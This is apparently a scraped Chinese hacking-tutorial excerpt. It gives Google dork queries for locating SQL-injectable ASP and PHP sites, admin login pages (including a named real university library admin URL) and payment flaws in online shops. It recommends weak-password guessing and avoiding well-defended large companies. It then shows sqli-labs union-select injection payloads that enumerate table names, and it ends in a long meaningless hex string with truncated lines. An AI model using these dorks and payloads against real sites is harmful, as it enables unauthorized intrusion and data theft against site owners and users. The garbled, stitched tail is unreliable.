怎么找漏洞?SQL注入漏洞首先是SQL注入,这个漏洞说实话,谷歌语法找的快。
谷歌语法: inurl:asp?id=12 公司
这里找的是asp的站,你问为啥找asp的站?
其中一个最重要的原因就是因为他,好日!
id值可以不断地变换。
如果有兴趣的话,也可以搜搜 inurl:php?id=12 公司
这也是可以找到很多站的,不过加WAF的几率很大
后台管理漏洞语法: inurl:admin 东莞理工 | inurl:admin.php XXX
http://dgutlib.gofront.cn/index.php?action=adminLogin
虽然这网站好找,但能够弱密码进入的却很少,这里就看大佬的各显神通了。
当然如果不想找到国外其它奇奇怪怪的站点的话,建议加个关键词公司
1inurl/admin/login.php 公司
搞后台,一般都是要信息收集先。
支付漏洞这种漏洞咋找?商城,积分商城。
试试谷歌语法: info: 商城 AND 积分商城
这不全是商城吗,当然对于一些大厂,建议不要去搞……
因为防护也会比一般的站点比较严格,况且现在做在线网 ...
SQL注入判断注入类型判断注入类型是数字型还是字符型如果输入1 and 1=1和1 and 1=2页面的查询结果都返回相同的内容,说明不是数字型注入。既然不是数字型,那就有很大的可能是字符型注入了。如果是字符型则需要对单引号(’)进行闭合
Get显错注入联合查询以sqli_labs第一关为例
判断字符型还是数字型1?id=1asd
发现可以显示,为字符型
判断列数1?id=1' order by 4%23
发现4错,3可以正常显示,即列数为3
判断注入点,即回显位
1?id=-1' union select 1,2,3%23
回显位置为2,3的位置
获取数据库名、版本1?id=-1' union select 1,2,3%23
发现数据库名字为security
获取数据库表名1?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3%23 ...
97b2b2fe323604bfc8fe2648fe355975dbded2c1f3ce63044122ea22c113c12ab9cb24c9248b990e65fe3bb908a65d77e9016411e257ff550ccfa6fb52cba12922e2726938283d16141ad1e0df1ac4e4257f6c21813982a8c40ddedda5175e55ef3cecc6ddd122205046b9b0535bd0d7fcc687ff54d6fdc318d1be48e7a0074c1505071fce8bfb6d6b1b9e2e93a622dbf18dc09786c662ff62789f1fff03d4ed505f23030e5e50a9b2f42821299faa7f01dade9176cc7336611a425239c8b31d31e9f073d6f1d083fd6d5e5a38f87b819796af16e8396f45c4e23ee12d5be2b0d81f86f86ec5029ddc64d0d36248a7e27bc329966011ce901 ...